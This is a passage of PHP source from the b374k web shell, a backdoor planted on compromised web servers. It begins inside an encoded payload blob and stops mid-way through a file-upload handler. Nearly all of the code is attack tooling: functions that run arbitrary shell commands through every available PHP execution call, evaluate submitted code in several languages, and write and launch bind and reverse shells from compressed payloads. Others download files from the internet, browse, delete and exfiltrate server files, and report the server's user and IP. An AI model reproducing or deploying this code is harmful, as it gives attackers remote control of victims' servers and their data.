+ufVDPqh5896P1y9gFCQS7XO09oz/BT5X2VFEYITsAZUo86ArEgnzwy8sJBQxFQC+kwLKTJwqP3JS5N5ji4nWnxfeWSnDcL+/JJabhsi221j2TzdemGrysC0j1skx6ELXrxPV2tVsAP51uFkv9s9VgTEiFSVKWg7nsP5GRxWrBJZ2m+7en6dhnIep/D2XNRakeXXGdSCWO9dVCY25OsF1YM++HxT9J7g/4tBhE/5cXj9FH0CiMPg1fR3QKujqOpZwOIhxjtVB0CyERzSmpdjVGV4LeOjDmMq+5A9yPw1LHJJrQVq57U8rkZjvhpXyxHu3yeIjMbmZzSuizXH8UrfrWN6022DXsvl0WfrheCu8LIbO4Lj2oFivk7UuLyv8LrYKN+61Kl8OLWatEun9ne/GLRVU3u+P6LDCVQKQb9P2kVeideo0ezQ1kt3HkLOzSPwLsm4crl+usqdTz9DleT3Z2bjcMUgSn90OcdyFuSGhAZBUzo4QToIUBrkhhXXnPeDYOslO5aVswjaulqMBXtjV8Px/sLJgXXnZ/3ReLT1oh1tuoLUEPtPKX00VeHLGV2a1uWMhmWlSCFLXNafQZbMGTq9JcHhsB4O9TCkDqEascfeshdSrTL4S1ReWpWWU7SBwSiwBs0Jtgwry+9jJaxMXP5VrHyvSij1v4OXfIeXRqbgYS5feqQXsQWNaL0gYrfenEEKNpG015uT4SQAJ5vPPPjTg0CMSQwrB2bMjNpJFiEcpE39Pr7uFxEJIO2904/BHHKc+Y+C9vuA+WON2T+I2R+VkyUmPIaQFtEqod5N3BrfNPdzuje//mIj3YeMh9JWa+aQdKIH1g5+l8E/YzWIIcoUyk35fRxxleX+upD5TxHIEoIE3bFCquoba+PjxSDR2E8iW67wCRsYoMosoCJ8/E1BztL6kgk+vvVGQ/zi9wCpOlR3WYpIjXRE6jQzZSNaquus8MU2TzTkxPhJmLkmkc4eYMtvrNKnJz0WtrrEFjq/a3VPT0Yt8SWSBjXfKtetNyZssK8wVKhs9a88W3GgBNSznNivOho+mEJohng786Q+a9mJ044gem7BxBQmTBuMZozd4nvKbuvQta229RV4tJU9Tumwym7r+bycFzyFRPV6HeAX88X2J10igO63XCyAjVafNV3BE/VdlxDe5KR0Biox3uov6q6A24fb8fArM5zMO4sA3GQqw73+OTiSwEkjxalSQlPwlEigqNs9oJf+pvI4jY4qau0R8oJilcRQWjY/rUsvIpsKGnp6P9v6GiXmdYDrb6+TYL8Gt1Io9AgOOygUEg02lwwQwcqmKY9wYWnFQYFNNe0G3n0Wh50qkm6dQu+xkS1fCWb2PXbS9TKQeTOTrp5KwfTuyVbUBHgVOrwT/wU=";
89
90// make link for folder $cwd and all of its parent folder
91function swd($p){
92 $ps = explode(DIRECTORY_SEPARATOR,$p);
93 $pu = "";
94 for($i = 0 ; $i < sizeof($ps)-1 ; $i++){
95 $pz = "";
96 for($j = 0 ; $j <= $i ; $j++) $pz .= $ps[$j].DIRECTORY_SEPARATOR;
97 $pu .= "<a href=\"?d=".$pz."\">".$ps[$i]." ".DIRECTORY_SEPARATOR." </a>";
98 }
99 return trim($pu);
100}
101// remove <br />tags
102function rp($t){
103 return trim(str_replace("<br />","",$t));
104}
105// replace spaces with underscore ( _ )
106function cs($t){
107 return str_replace(" ","_",$t);
108}
109// strip slashes,trim and urldecode
110function ss($t){
111 return (!get_magic_quotes_gpc())? trim(urldecode($t)) : trim(urldecode(stripslashes($t)));
112}
113// only strip slashes
114function ssc($t){
115 return (!get_magic_quotes_gpc())? $t : stripslashes($t);
116}
117// bind and reverse shell
118function rs($rstype,$rstarget,$rscode){
119 //bind_pl bind_py bind_rb bind_c bind_win bind_php back_pl back_py back_rb back_c back_win back_php
120 //resources $rs_pl $rs_py $rs_rb $rs_c $rs_win $rs_php
121 $result = "";
122 $fc = gzinflate(base64_decode($rscode));
123
124 $errperm = "Directory ".getcwd().DIRECTORY_SEPARATOR." is not writable, please change to a writable one";
125 $errgcc = "Unable to compile using gcc";
126
127 $split = explode("_",$rstype);
128 $method = $split[0];
129 $lang = $split[1];
130 if($lang=="py" || $lang=="pl" || $lang=="rb"){
131 if($lang=="py") $runlang = "python";
132 elseif($lang=="pl") $runlang = "perl";
133 elseif($lang=="rb") $runlang = "ruby";
134 $fpath = "b374k_rs.".$lang;
135 if(is_file($fpath)) unlink($fpath);
136 if($file=fopen($fpath,"w")){
137 fwrite($file,$fc);
138 fclose($file);
139 if(is_file($fpath)){
140 $result = exe("chmod +x ".$fpath);
141 $result = exe($runlang." ".$fpath." ".$rstarget);
142 }
143 else $result = $errperm;
144 }
145 else $result = $errperm;
146 }
147 elseif($lang=="c"){
148 $fpath = "b374k_rs";
149 if(is_file($fpath)) unlink($fpath);
150 if(is_file($fpath.".c")) unlink($fpath.".c");
151 if($file=fopen($fpath.".c","w")){
152 fwrite($file,$fc);
153 fclose($file);
154 if(is_file($fpath.".c")){
155 $result = exe("gcc ".$fpath.".c -o ".$fpath);
156 if(is_file($fpath)){
157 $result = exe("chmod +x ".$fpath);
158 $result = exe("./".$fpath." ".$rstarget);
159 }
160 else $result = $errgcc;
161 }
162 else $result = $errperm;
163 }
164 else $result = $errperm;
165 }
166 elseif($lang=="win"){
167 $fpath = "b374k_rs.exe";
168 if(is_file($fpath)) unlink($fpath);
169 if($file=fopen($fpath,"w")){
170 fwrite($file,$fc);
171 fclose($file);
172 if(is_file($fpath)){
173 $result = exe($fpath." ".$rstarget);
174 }
175 else $result = $errperm;
176 }
177 else $result = $errperm;
178 }
179 elseif($lang=="php"){
180 eval("?>".$fc);
181 }
182 if(is_file($fpath)) unlink($fpath);
183 if(is_file($fpath.".c")) unlink($fpath.".c");
184 return $result;
185}
186// get file size
187function gs($f){
188 $s = filesize($f);
189 if($s !== false){
190 if($s<=0) return 0;
191 $w = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
192 $e = floor(log($s)/log(1024));
193 return sprintf('%.2f '.$w[$e], ($s/pow(1024, floor($e))));
194 }
195 else return "???";
196}
197// get file permissions
198function gp($f){
199 if($m=fileperms($f)){
200 $p='';
201 $p .= ($m & 00400) ? 'r' : '-';
202 $p .= ($m & 00200) ? 'w' : '-';
203 $p .= ($m & 00100) ? 'x' : '-';
204 $p .= ($m & 00040) ? 'r' : '-';
205 $p .= ($m & 00020) ? 'w' : '-';
206 $p .= ($m & 00010) ? 'x' : '-';
207 $p .= ($m & 00004) ? 'r' : '-';
208 $p .= ($m & 00002) ? 'w' : '-';
209 $p .= ($m & 00001) ? 'x' : '-';
210 return $p;
211 }
212 else return "??????????";
213}
214// shell command
215function exe($c){
216 $out = "";
217 $c = $c." 2>&1";
218
219 if(is_callable('system')) {
220 ob_start();
221 system($c);
222 $out = ob_get_contents();
223 ob_end_clean();
224 if(!empty($out)) return $out;
225 }
226 if(is_callable('shell_exec')){
227 $out = shell_exec($c);
228 if(!empty($out)) return $out;
229 }
230 if(is_callable('exec')) {
231 exec($c,$r);
232 foreach($r as $s){
233 $out .= $s;
234 }
235 if(!empty($out)) return $out;
236 }
237 if(is_callable('passthru')) {
238 ob_start();
239 passthru($c);
240 $out = ob_get_contents();
241 ob_end_clean();
242 if(!empty($out)) return $out;
243 }
244 if(is_callable('proc_open')) {
245 $descriptorspec = array(
246 0 => array("pipe", "r"),
247 1 => array("pipe", "w"),
248 2 => array("pipe", "w")
249 );
250 $proc = proc_open($c, $descriptorspec, $pipes, getcwd(), array());
251 if (is_resource($proc)) {
252 while ($si = fgets($pipes[1])) {
253 if(!empty($si)) $out .= $si;
254 }
255 while ($se = fgets($pipes[2])) {
256 if(!empty($se)) $out .= $se;
257 }
258 }
259 proc_close($proc);
260 if(!empty($out)) return $out;
261 }
262 if(is_callable('popen')){
263 $f = popen($c, 'r');
264 if($f){
265 while(!feof($f)){
266 $out .= fread($f, 2096);
267 }
268 pclose($f);
269 }
270 if(!empty($out)) return $out;
271 }
272 return "";
273}
274// add slash to the end of given path
275function cp($p){
276 if(is_dir($p)){
277 $x = DIRECTORY_SEPARATOR;
278 while(substr($p,-1) == $x) $p = rtrim($p,$x);
279 return $p.$x;
280 }
281 return $p;
282}
283// delete dir and all of its content (no warning !) xp
284function rmdirs($d) {
285 $f = glob($d . '*', GLOB_MARK);
286 foreach($f as $z){
287 if(is_dir($z)) rmdirs($z);
288 else unlink($z);
289 }
290 if(is_dir($d)) rmdir($d);
291}
292function xwhich($pr){
293 $p = exe("which $pr");
294 if(trim($p)!="") { return trim($p); } else { return trim($pr); }
295}
296// download file from internet
297function dlfile($u,$p){
298 $n = basename($u);
299
300 // try using php functions
301 if($t = file_get_contents($u)){
302 if(is_file($p)) unlink($p);;
303 if($f=fopen($p,"w")){
304 fwrite($f,$t);
305 fclose($f);
306 if(is_file($p)) return true;
307 }
308 }
309 // using wget
310 exe(xwhich('wget')." ".$u." -O ".$p);
311 if(is_file($p)) return true;
312
313 // try using lwp-download
314 exe(xwhich('lwp-download')." ".$u." ".$p);
315 if(is_file($p)) return true;
316
317 // try using lynx
318 exe(xwhich('lynx')." -source ".$u." > ".$p);
319 if(is_file($p)) return true;
320
321 // try using curl
322 exe(xwhich('curl')." ".$u." -o ".$p);
323 if(is_file($p)) return true;
324
325 return false;
326}
327// find writable dir
328function get_writabledir(){
329 if(is_writable(".")) $d = ".".DIRECTORY_SEPARATOR;
330 else{
331 if(!$d = getenv("TMP")) if(!$d = getenv("TEMP")) if(!$d = getenv("TMPDIR")){
332 if(is_writable("/tmp")) $d = "/tmp/";
333 else $d = getcwd().DIRECTORY_SEPARATOR;
334 }
335 }
336 return $d;
337}
338// zip function
339function zip($src, $dest){
340 if(!extension_loaded('zip') || !file_exists($src)) return false;
341
342 if(class_exists("ZipArchive")){
343 $zip = new ZipArchive();
344 if(!$zip->open($dest, 1)) return false;
345
346 $src = str_replace('\\', '/', $src);
347 if(is_dir($src)){
348 $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($src), 1);
349 foreach($files as $file){
350 $file = str_replace('\\', '/', $file);
351 if(in_array(substr($file, strrpos($file, '/')+1), array('.', '..'))) continue;
352 if (is_dir($file) === true) $zip->addEmptyDir(str_replace($src . '/', '', $file . '/'));
353 else if (is_file($file) === true) $zip->addFromString(str_replace($src . '/', '', $file), file_get_contents($file));
354 }
355 }
356 elseif(is_file($src) === true) $zip->addFromString(basename($src), file_get_contents($src));
357 $zip->close();
358 return true;
359 }
360}
361// check shell permission to access program
362function check_access($lang){
363 switch($lang){
364 case "python":
365 $cek = strtolower(exe("python -h"));
366 if(strpos($cek,"usage")!==false) return true;
367 break;
368 case "perl":
369 $cek = strtolower(exe("perl -h"));
370 if(strpos($cek,"usage")!==false) return true;
371 break;
372 case "ruby":
373 $cek = strtolower(exe("ruby -h"));
374 if(strpos($cek,"usage")!==false) return true;
375 break;
376 case "gcc":
377 $cek = strtolower(exe("gcc --help"));
378 if(strpos($cek,"usage")!==false) return true;
379 break;
380 case "tar":
381 $cek = strtolower(exe("tar --help"));
382 if(strpos($cek,"usage")!==false) return true;
383 break;
384 case "java":
385 $cek = strtolower(exe("javac --help"));
386 if(strpos($cek,"usage")!==false){
387 $cek = strtolower(exe("java -h"));
388 if(strpos($cek,"usage")!==false) return true;
389 }
390 break;
391 }
392 return false;
393}
394// find available archiver
395function get_archiver_available(){
396 $dlfile = "";
397 $avail_arc = array("raw"=>"raw");
398
399 if(class_exists("ZipArchive")){
400 $avail_arc["ziparchive"] = "zip";
401 }
402 if(check_access("tar")){
403 $avail_arc["tar"] = "tar";
404 $avail_arc["targz"] = "tar.gz";
405 }
406
407 $option_arc = "";
408 foreach($avail_arc as $t=>$u){
409 $option_arc .= "<option value=\"".$t."\">".$u."</option>";
410 }
411
412 $dlfile .= "<form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">
413 <select onchange=\"download(this);\" name=\"dltype\" class=\"inputzbut\" style=\"width:80px;height:20px;\">
414 <option value=\"\" disabled selected>Download</option>
415 ".$option_arc."
416 </select>
417 <input type=\"hidden\" name=\"dlpath\" value=\"__dlpath__\" />
418 <input type=\"hidden\" name=\"d\" value=\"__dlcwd__\" />
419 </form>
420 ";
421 return $dlfile;
422}
423// explorer, return a table of given dir
424function showdir($cwd){
425 $posix = (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))? true : false;
426 $win = (strtolower(substr(php_uname(),0,3)) == "win")? true : false;
427
428 $fname = array();
429 $dname = array();
430
431 if(function_exists("scandir") && $dh = @scandir($cwd)){
432 foreach($dh as $file){
433 if(is_dir($file)) $dname[] = $file;
434 elseif(is_file($file)) $fname[] = $file;
435 }
436 }
437 else{
438 if($dh = @opendir($cwd)){
439 while($file = readdir($dh)){
440 if(is_dir($file)) $dname[] = $file;
441 elseif(is_file($file))$fname[] = $file;
442 }
443 closedir($dh);
444 }
445 }
446
447 sort($fname);
448 sort($dname);
449
450 $path = explode(DIRECTORY_SEPARATOR,$cwd);
451 $tree = sizeof($path);
452 $parent = "";
453 $owner_html = (!$win && $posix) ? "<th style=\"width:120px;\">owner : group</th>" : "";
454 $buff = "
455 <table class=\"explore sortable\">
456 <tr><th>name</th><th style=\"width:60px;\">size</th>".$owner_html."<th style=\"width:70px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:180px;\">action</th><th style=\"width:90px;\">download</th></tr>
457 ";
458 if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
459 else $parent = $cwd;
460
461 $dlfile = get_archiver_available();
462
463 foreach($dname as $folder){
464 if(!$win && $posix){
465 $name = posix_getpwuid(fileowner($folder));
466 $group = posix_getgrgid(filegroup($folder));
467 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
468 $owner_html = "<td style=\"text-align:center;\">".$owner."</td>";
469 }
470 $dlfile_ = str_replace("<option value=\"raw\">raw</option>", "", $dlfile);
471 $dlfile_ = str_replace("__dlpath__",$folder,$dlfile_);
472 $dlfile_ = str_replace("__dlcwd__",$cwd,$dlfile_);
473 if($folder == ".") {
474 $buff .= "<tr><td class=\"explorelist\" onmouseup=\"xplgo('".addslashes($cwd)."');\"><a href=\"?d=".$cwd."\">[ $folder ]</a></td><td>LINK</td>".$owner_html."<td style=\"text-align:center;\">".gp($cwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($cwd))."</td><td><span id=\"titik1\"><a href=\"?upload&d=$cwd\">upload</a> | <a href=\"?d=$cwd&edit=".$cwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
475 <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
476 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
477 <input class=\"inputz\" id=\"titik1_\" style=\"width:110px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
478 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
479 </form></td><td>".$dlfile_."</td></tr>
480 ";
481 }
482 elseif($folder == "..") {
483 $buff .= "<tr><td class=\"explorelist\" onmouseup=\"xplgo('".addslashes($parent)."');\"><a href=\"?d=".$parent."\">[ $folder ]</a></td><td>LINK</td>".$owner_html."<td style=\"text-align:center;\">".gp($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($parent))."</td><td><span id=\"titik2\"><a href=\"?upload&d=$parent\">upload</a> | <a href=\"?d=$cwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
484 <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
485 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
486 <input class=\"inputz\" id=\"titik2_\" style=\"width:110px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
487 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
488 </form>
489 </td><td>".$dlfile_."</td></tr>";
490 }
491 else {
492 $buff .= "<tr><td class=\"explorelist\" onmouseup=\"xplgo('".addslashes($cwd.$folder.DIRECTORY_SEPARATOR)."');\"><a id=\"".cs($folder)."_link\" href=\"?d=".$cwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a>
493 <form onclick=\"cancelBubble(event);\" action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" id=\"".cs($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
494 <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
495 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
496 <input class=\"inputz\" style=\"width:200px;\" id=\"".cs($folder)."_link_\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
497 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
498 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".cs($folder)."_form','".cs($folder)."_link');\" />
499 </form>
500 <td>DIR</td>".$owner_html."<td style=\"text-align:center;\">".gp($cwd.$folder)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($folder))."</td><td><a href=\"?upload&d=".$cwd.$folder."\">upload</a> | <a href=\"javascript:tukar('".cs($folder)."_link','".cs($folder)."_form');\">rename</a> | <a href=\"?d=".$cwd."&rmdir=".$cwd.$folder."\">delete</a></td><td>".$dlfile_."</td></tr>";
501 }
502 }
503
504 foreach($fname as $file){
505 $full = $cwd.$file;
506 if(!$win && $posix){
507 $name = posix_getpwuid(fileowner($full));
508 $group = posix_getgrgid(filegroup($full));
509 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
510 $owner_html = "<td style=\"text-align:center;\">".$owner."</td>";
511 }
512 $dlfile_ = str_replace("__dlpath__",$file,$dlfile);
513 $dlfile_ = str_replace("__dlcwd__",$cwd,$dlfile_);
514 $buff .= "<tr><td class=\"explorelist\" onmouseup=\"xplgo('".addslashes($cwd)."&view=".addslashes($full)."');\"><a id=\"".cs($file)."_link\" href=\"?d=$cwd&view=$full\">$file</a>
515 <form onclick=\"cancelBubble(event);\" action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" id=\"".cs($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
516 <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
517 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
518 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" id=\"".cs($file)."_link_\" name=\"newname\" value=\"".$file."\" />
519 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
520 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".cs($file)."_link','".cs($file)."_form');\" />
521 </form>
522 </td><td title=\"".filesize($full)."\">".gs($full)."</td>".$owner_html."<td style=\"text-align:center;\">".gp($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($full))."</td>
523 <td><a href=\"?d=$cwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".cs($file)."_link','".cs($file)."_form');\">rename</a> | <a href=\"?d=$cwd&delete=$full\">delete</a></td><td>".$dlfile_."</td></tr>";
524 }
525 $buff .= "</table>";
526 return $buff;
527}
528
529// favicon
530if(isset($_REQUEST['favicon'])){
531 $data = gzinflate(base64_decode($favicon));
532 header("Content-type: image/png");
533 header("Cache-control: public");
534 echo $data;
535 exit;
536}
537if(isset($_REQUEST['font'])){
538 $data = gzinflate(base64_decode($font));
539 header("Content-type: application/font-woff");
540 header("Cache-control: public");
541 echo $data;
542 exit;
543}
544
545if($s_auth){
546 // server software
547 $s_software = getenv("SERVER_SOFTWARE");
548 // uname -a
549 $s_system = php_uname();
550 // check os
551 $s_win = (strtolower(substr($s_system,0,3)) == "win")? true : false;
552 // change working directory
553 if(isset($_REQUEST['d'])){
554 $dd = ss($_REQUEST['d']);
555 if(is_dir($dd)){
556 chdir($dd);
557 $cwd = cp($dd);
558 }
559 }
560 else $cwd = cp(getcwd());
561 // get path and all drives available
562 $letters = '';
563 if(!$s_win){
564 if(!$s_user = rp(exe("whoami"))) $s_user = "";
565 if(!$s_id = rp(exe("id"))) $s_id = "";
566 }
567 else {
568 $s_user = get_current_user();
569 $s_id = $s_user;
570 // find drive letters
571 $v = explode("\\",$cwd);
572 $v = $v[0];
573 foreach (range("A","Z") as $letter){
574 $bool = (is_dir($letter.":\\") && is_readable($letter.":\\"));
575 if ($bool){
576 $letters .= "<a href=\"?d=".$letter.":\\\">[ ";
577 if ($letter.":" != $v) {$letters .= $letter;}
578 else {$letters .= "<span style=\"color:#fff;\">".$letter."</span>";}
579 $letters .= " ]</a> ";
580 }
581 }
582 }
583 // prompt style..
584 $s_prompt = $s_user." >";
585
586 // check for posix
587 $s_posix = (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))? true : false;
588
589 // server ip
590 $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
591 // your ip ;-)
592 $s_my_ip = $_SERVER['REMOTE_ADDR'];
593
594
595 // sorttable.js
596 if(isset($_REQUEST['sorttable'])){
597 $data = gzinflate(base64_decode($sortable_js));
598 header("Content-type: text/javascript");
599 header("Cache-control: public");
600 echo $data;
601 exit;
602 }
603 if(!empty($_REQUEST['dltype']) && !empty($_REQUEST['dlpath'])){
604 $dltype = urldecode(ss($_REQUEST['dltype']));
605 $dlpath = urldecode(ss($_REQUEST['dlpath']));
606
607 $dlname = basename($dlpath);
608 if($dlpath==".") $dlname=basename($cwd);
609 elseif($dlpath==".."){
610 chdir("..");
611 $dlname=basename(getcwd());
612 chdir($cwd);
613 }
614 $tmpdir = get_writabledir();
615 $dlarchive = $tmpdir.$dlname;
616 $dlthis = "";
617 if($dltype=="ziparchive"){
618 $dlarchive .= ".zip";
619 if(zip($dlpath,$dlarchive)){
620 $dlthis = $dlarchive;
621 }
622 }
623 elseif($dltype=="tar"){
624 $dlarchive .= ".tar";
625 $dlarchive = str_replace('\\', '/', $dlarchive);
626 exe("tar cf ".$dlarchive." ".$dlpath);
627 $dlthis = $dlarchive;
628 }
629 elseif($dltype=="targz"){
630 $dlarchive .= ".tar.gz";
631 $dlarchive = str_replace('\\', '/', $dlarchive);
632 exe("tar czf ".$dlarchive." ".$dlpath);
633 $dlthis = $dlarchive;
634 }
635 elseif($dltype=="raw"){
636 if(is_file($dlpath)) $dlthis = $dlpath;
637 }
638
639
640 if(is_file($dlthis)){
641 header("Content-Type: application/octet-stream");
642 header('Content-Transfer-Encoding: binary');
643 header("Content-length: ".filesize($dlthis));
644 header("Content-disposition: attachment; filename=\"".basename($dlthis)."\";");
645 $file = @fopen($dlthis,"rb");
646 while(!feof($file)){
647 print(@fread($file, 1024*8));
648 ob_flush();
649 flush();
650 }
651 fclose($file);
652
653 if($dltype!="raw"){
654 rename($dlthis,$dlthis."del");
655 unlink($dlthis."del");
656 }
657 exit;
658 }
659 }
660 // view image specified by ?img=<file>
661 if(isset($_REQUEST['img'])){
662 ob_clean();
663 $d = ss($_REQUEST['d']);
664 $f = ss($_REQUEST['img']);
665 $inf = getimagesize($d.$f);
666 $ext = explode($f,".");
667 $ext = $ext[count($ext)-1];
668 header("Content-type: ".$inf["mime"]);
669 header("Cache-control: public");
670 header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
671 header("Cache-control: max-age=".(60*60*24*7));
672 readfile($d.$f);
673 exit;
674 }
675 // rename file or folder
676 if(isset($_REQUEST['rename']) && isset($_REQUEST['oldname']) && isset($_REQUEST['newname'])){
677 $old = ss($_REQUEST['oldname']);
678 $new = ss($_REQUEST['newname']);
679 if(rename($cwd.$old,$cwd.$new)) $dirmsg = "File ".$old." renamed to ".$new;
680 else $dirmsg = "Unable to rename file ".$old." to ".$new;
681 $fnew = $cwd.$new;
682 }
683 // delete file
684 if(!empty($_REQUEST['delete'])){
685 $f = ss($_REQUEST['delete']);
686 if(is_file($f)){
687 if(unlink($f)) $dirmsg = "File removed : ".$f;
688 else $dirmsg = "Unable to remove file ".$f;
689 }
690 else $dirmsg = "Unable to remove file ".$f;
691 } // delete dir
692 elseif(!empty($_REQUEST['rmdir'])){
693 $f = ss(rtrim(ss($_REQUEST['rmdir'],DIRECTORY_SEPARATOR)));
694 if(is_dir($f)){
695 rmdirs($f);
696 if(is_dir($f)) $dirmsg = "Unable to remove directory ".$f;
697 else $dirmsg = "Directory removed : ".$f;
698 }
699 else $dirmsg = "Unable to remove directory ".$f;
700 } // create dir
701 elseif(!empty($_REQUEST['mkdir'])){
702 $f = ss($cwd.ss($_REQUEST['mkdir']));
703 if(!is_dir($f)){
704 mkdir($f);
705 if(is_dir($f)) $dirmsg = "Directory created ".$f;
706 else $dirmsg = "Unable to create directory ".$f;
707 }
708 else $dirmsg = "Directory already exists ".$f;
709 }
710 // box result
711 $s_result = "";
712 // php eval() function
713 if(isset($_REQUEST['eval'])){
714 $code = "";
715 $lang = "php";
716 // access to compiler/interpreter
717
718 $s_python = check_access("python");
719 $s_perl = check_access("perl");
720 $s_ruby = check_access("ruby");
721 $s_gcc = check_access("gcc");
722 $s_java = check_access("java");
723
724 if(isset($_REQUEST['evalcode'])){
725 $code = ss($_REQUEST['evalcode']);
726 $tmpdir = get_writabledir();
727 if(isset($_REQUEST['lang'])){
728 $lang = $_REQUEST['lang'];
729 }
730
731 if(strtolower($lang)=='php'){
732 ob_start();
733 eval($code);
734 $res = ob_get_contents();
735 ob_end_clean();
736 $code = $res;
737 }
738 elseif(strtolower($lang)=='python'||strtolower($lang)=='perl'||strtolower($lang)=='ruby'){
739 $rand = md5(time().rand(0,100));
740 $script = $tmpdir.$rand;
741 file_put_contents($script, $code);
742 if(is_file($script)){
743 $res = exe($lang." ".$script);
744 unlink($script);
745 }
746 $code = $res;
747 }
748 elseif(strtolower($lang)=='gcc'){
749 $script = md5(time().rand(0,100));
750 chdir($tmpdir);
751 file_put_contents($script.".c", $code);
752 if(is_file($script.".c")){
753 $scriptout = $s_win ? $script.".exe" : $script;
754 $res = exe("gcc ".$script.".c -o ".$scriptout);
755 if(is_file($scriptout)){
756 $res = $s_win ? exe($scriptout) : exe("chmod +x ".$scriptout." ; ./".$scriptout);
757 rename($scriptout, $scriptout."del");
758 unlink($scriptout."del");
759 }
760 unlink($script.".c");
761 }
762 $code = $res;
763 chdir($cwd);
764 }
765 elseif(strtolower($lang)=='java'){
766 if(preg_match("/class\ ([^{]+){/i",$code, $r)){
767 $classname = trim($r[1]);
768 $script = $classname;
769 }
770 else{
771 $rand = "b374k_".substr(md5(time().rand(0,100)),0,8);
772 $script = $rand;
773 $code = "class ".$rand." { ".$code . " } ";
774 }
775 chdir($tmpdir);
776 file_put_contents($script.".java", $code);
777 if(is_file($script.".java")){
778 $res = exe("javac ".$script.".java");
779 if(is_file($script.".class")){
780 $res .= exe("java ".$script);
781 unlink($script.".class");
782 }
783 unlink($script.".java");
784 }
785 chdir($pwd);
786 $code = $res;
787 }
788 }
789
790 $lang_available = "";
791 $lang_available .= "<option value=\"php\">php</option>";
792 $selected = "";
793 if($s_python){
794 $checked = ($lang == "python") ? "selected" : "";
795 $lang_available .= "<option value=\"python\" ".$checked.">python</option>";
796 }
797 if($s_perl){
798 $checked = ($lang == "perl") ? "selected" : "";
799 $lang_available .= "<option value=\"perl\" ".$checked.">perl</option>";
800 }
801 if($s_ruby){
802 $checked = ($lang == "ruby") ? "selected" : "";
803 $lang_available .= "<option value=\"ruby\" ".$checked.">ruby</option>";
804 }
805 if($s_gcc){
806 $checked = ($lang == "gcc") ? "selected" : "";
807 $lang_available .= "<option value=\"gcc\" ".$checked.">c</option>";
808 }
809 if($s_java){
810 $checked = ($lang == "java") ? "selected" : "";
811 $lang_available .= "<option value=\"java\" ".$checked.">java</option>";
812 }
813
814 $s_result .= "<form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">
815 <textarea id=\"evalcode\" name=\"evalcode\" class=\"evalcode\">".htmlspecialchars($code)."</textarea>
816 <table><tr><td><input type=\"submit\" name=\"evalcodesubmit\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
817 </td><td><select name=\"lang\" class=\"inputzbut\" style=\"width:120px;height:30px;padding:4px;\">
818 ".$lang_available."
819 </select></td></tr>
820 </table>
821 <input type=\"hidden\" name=\"eval\" value=\"\" />
822 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
823 </form>
824 ";
825 } // upload !
826 elseif(isset($_REQUEST['upload'])){
827 $s_result = " ";
828 $msg = "";
829 if(isset($_REQUEST['uploadhd'])){
830 $fn = $_FILES['filepath']['name'];
831 if(is_uploaded_file($_FILES['filepath']['tmp_name'])){
832 $p = cp(ss($_REQUEST['savefolder']));
833 if(!is_dir($p)) $p = cp(dirname($p));
834 if(isset($_REQUEST['savefilename']) && (trim($_REQUEST['savefilename'])!="")) $fn = ss($_REQUEST['savefilename']);
835 $tm = $_FILES['filepath']['tmp_name'];
836 $pi = cp($p).$fn;
837 $st = move_uploaded_file($tm,$pi);
838 if($st) $msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=".$cwd."&view=".$pi."\">".$pi."</a></p>";
839 else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
840 }
841 else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
842 }
843 elseif(isset($_REQUEST['uploadurl'])){
844 // function dlfile($url,$fpath){
845 $p = cp(ss($_REQUEST['savefolderurl']));
846 if(!is_dir($p)) $p = cp(dirname($p));
